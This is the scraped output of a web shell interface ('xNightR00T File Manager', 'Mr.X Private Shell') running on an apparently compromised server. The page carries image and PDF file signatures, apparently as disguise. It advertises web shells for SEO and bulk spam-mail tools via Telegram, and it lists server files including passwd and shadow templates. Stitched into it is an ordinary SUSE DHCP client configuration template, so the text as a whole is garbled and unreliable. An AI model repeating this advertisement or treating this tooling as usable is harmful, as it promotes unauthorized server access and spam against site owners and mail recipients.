xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
## Type:        list(enabled,disabled,default,)
## Default:     ""
#
# Default is to use the FQDN option, when the DHCLIENT_HOSTNAME_OPTION
# variable is set to a full hostname, that is, when it contains a dot.
# When DHCLIENT_HOSTNAME_OPTION is set to AUTO, short hostname from
# /etc/hostname is send via hostname option 12 (same as SLES-11).
#
DHCLIENT_FQDN_ENABLED=""

## Type:        list(both,ptr,none,)
## Default:     ""
#
# Request to update A and PTR or only the PTR DNS records using the
# hostname specified in DHCLIENT_HOSTNAME_OPTION variable.
# Default is to update 'both' when hostname is set or 'none' when
# the hostname is empty and DHCLIENT_FQDN_ENABLED is set to enabled.
#
DHCLIENT_FQDN_UPDATE=""

## Type:        yesno
## Default:     yes
#
# Qualify relative sub-domains/hostname in the DHCLIENT_HOSTNAME_OPTION
# variable adding a final dot ('foo.bar' -> 'foo.bar.').
# When disabled, the DHCP server may append it's update domain to the
# hostname (e.g. 'foo.bar' -> 'foo.bar.example.net').
#
DHCLIENT_FQDN_QUALIFY="yes"

## Type:        yesno
## Default:     yes
#
# The FQDN option is encoding hostnames using canonical DNS wire format
# by default. This flag permits to enable use of the deprecated ascii
# format limited to a single label (host hostname) for compatibility
# purposes with draft implementation, which may be unsupported and cause
# that a DHCP server ignores the fqdn option request completely.
#
DHCLIENT_FQDN_ENCODE="yes"

## Type:	list(,default,none,all,dns,ntp,nis,tz,boot,smb,nds,slp,sip,log)
## Default:	""
#
# This variable permits to specify a space separated list of build-in
# facility names supported by the dhcp4 client modifying the default
# options used in requests and to update system settings (via netconfig).
#
# When empty, default settings configured in wicked-config(5) or built-in
# defaults are used. The special "default", "all", and "none" sets enable
# to request none, the built-in default set or all supported options,
# respectively. A "no-" or "-" in the front of a facility name permit to
# remove/disable it from the currently applied set, e.g. "default,-nis"
# disables request for nis options.
# More specific variables as DHCLIENT_SET_DEFAULT_ROUTE,_SET_HOSTNAME or
# the MTU option have higher precedence.
#
DHCLIENT_UPDATE=""

## Type:	list(,yes,no)
## Default:	""
#
# Request broadcast responses from dhcp-server.
#
# The default behaviour is to not request broadcast responses for any type
# of devices except of Infiniband, where it is mandatory and enabled.
#
DHCLIENT_BROADCAST=""

## Type:        list(,rfc4361,dhcpv6,dhcp6,rfc2132,hwaddr,none,disable)
#
# Overrides the DHCPv4 client-identifier type to use specified in the
# wicked-config(5) `create-cid` option, the interface type specific
# client-id type and compile time defaults.
# Note: e.g. DHCP over Infiniband (IPoIB) mandates an rfc4361 client-id.
#
DHCLIENT_CREATE_CID=""

## Type:        list(enabled,disabled,default,)
## Default:     ""
#
# Default is to use the FQDN option, when the DHCLIENT6_HOSTNAME_OPTION
# variable provides a hostname.
# When DHCLIENT6_HOSTNAME_OPTION is set to AUTO, short hostname from the
# /etc/hostname file is send (same to SLES-11).
#
DHCLIENT6_FQDN_ENABLED=""

## Type:        list(both,ptr,none,)
## Default:     ""
#
# Request to update AAAA and PTR or only the PTR DNS records using the
# hostname specified in DHCLIENT6_HOSTNAME_OPTION variable.
# Default is to update \fIboth\fR when hostname is given or \fInone\fR
# when hostname is empty and DHCLIENT6_FQDN_ENABLED is set to enabled.
#
DHCLIENT6_FQDN_UPDATE=""

## Type:        yesno
## Default:     yes
#
# Qualify relative sub-domains/hostname in the DHCLIENT6_HOSTNAME_OPTION
# variable adding a final dot ('foo.bar' -> 'foo.bar.').
# When disabled, the DHCP server may append it's update domain to the
# hostname (e.g. 'foo.bar' -> 'foo.bar.example.net').
#
DHCLIENT6_FQDN_QUALIFY="yes"

## Type:        string
## Default:     ""
#
# specify a client ID for DHCPv6
#
# This option allows to manually specify a client identifier (DUID) as a colon 
# separated hex byte string for DHCPv6. It disables the default behavior to
# maintain the client-id automatically, see wicked-config(5) and `wicked duid --help`
# for more details.
DHCLIENT6_CLIENT_ID=""

## Type:	list(,default,none,all,dns,ntp,tz,boot,nis,sip)
## Default:	""
#
# This variable permits to specify a space separated list of build-in
# facility names supported by the dhcp6 client modifying the default
# options used in requests and to update system settings (via netconfig).
#
# When empty, default settings configured in wicked-config(5) or built-in
# defaults are used. The special "default", "all", and "none" sets enable
# to request none, the built-in default set or all supported options,
# respectively. A "no-" or "-" in the front of a facility name permit to
# remove/disable it from the currently applied set, e.g. "default,-nis"
# disables request for nis options.
# The more specific variable DHCLIENT6_SET_HOSTNAME has higher precedence.
#
DHCLIENT6_UPDATE=""

#
# Type:		integer
# Default:	""
#
# Permits to specify explicit prefix-length to use for the DHCPv6 address,
# e.g. 64 to use address as 2001:db8::1/64 or 80 for 2001:db8::1/80.
# When 0 or unspecified (default), prefix-length of the smallest on-link
# prefix (highest /length number) in the IPv6 router advertisement matching
# the address is used or 128 (see also rfc5942).
#
DHCLIENT6_ADDRESS_LENGTH=""

#
# Type:		string
# Default:	""
#
# Permits to specify an explicit prefix-length (e.g. ::/56) or a specific
# prefix with a length (e.g. 2001:db8::/48), that are sent to the DHCPv6
# server as hint when prefix delegation request mode is enabled in the
# DHCLIENT6_MODE variable.
#
DHCLIENT6_PREFIX_HINT=""


Filemanager

Name Type Size Permission Actions
group.aaa_base File 382 B 0644
passwd.aaa_base File 573 B 0644
samba-client-dhcp.conf File 198 B 0644
shadow.aaa_base File 229 B 0644
sysconfig.SuSEfirewall2 File 34.57 KB 0644
sysconfig.atd File 451 B 0644
sysconfig.autofs File 499 B 0644
sysconfig.autoinstall File 804 B 0644
sysconfig.backup File 1.12 KB 0644
sysconfig.bootloader.default File 498 B 0644
sysconfig.bootloader.i386 File 534 B 0644
sysconfig.btrfsmaintenance File 4.05 KB 0644
sysconfig.config-network File 7.93 KB 0644
sysconfig.config-wicked File 1.53 KB 0644
sysconfig.console File 1.39 KB 0644
sysconfig.cron File 2.04 KB 0644
sysconfig.cron-man File 461 B 0644
sysconfig.dhcp-network File 8.58 KB 0644
sysconfig.dhcp-samba-client File 198 B 0644
sysconfig.dhcp-wicked File 5.67 KB 0644
sysconfig.dmraid File 612 B 0644
sysconfig.galera File 511 B 0644
sysconfig.ipmi File 2.51 KB 0644
sysconfig.irqbalance File 497 B 0644
sysconfig.kdump File 9.87 KB 0644
sysconfig.keyboard File 1.32 KB 0644
sysconfig.language File 3.12 KB 0644
sysconfig.lifecycle-report File 408 B 0644
sysconfig.mail File 788 B 0644
sysconfig.mail-postfix File 704 B 0644
sysconfig.mcelog File 386 B 0644
sysconfig.mdadm File 1.71 KB 0644
sysconfig.mouse-gpm File 1.09 KB 0644
sysconfig.net-snmp File 971 B 0644
sysconfig.news File 193 B 0644
sysconfig.nfs File 8.02 KB 0644
sysconfig.ntp File 1.89 KB 0644
sysconfig.pcscd File 195 B 0644
sysconfig.postfix File 15.09 KB 0644
sysconfig.proxy File 1.19 KB 0644
sysconfig.rpcbind File 173 B 0644
sysconfig.saslauthd File 865 B 0644
sysconfig.security File 569 B 0644
sysconfig.security-checksig File 228 B 0644
sysconfig.security-polkit_default_privs File 1.01 KB 0644
sysconfig.services-rpm File 379 B 0644
sysconfig.smartmontools File 1.35 KB 0644
sysconfig.snapper File 121 B 0644
sysconfig.ssh File 221 B 0644
sysconfig.storage-libstorage File 304 B 0644
sysconfig.storage-yast2-storage File 590 B 0644
sysconfig.syslog-ntp File 430 B 0644
sysconfig.syslog-rsyslog File 502 B 0600
sysconfig.windowmanager File 526 B 0644
sysconfig.xinetd File 158 B 0644
sysconfig.yast2 File 3.31 KB 0644
sysconfig.ypbind File 1.72 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1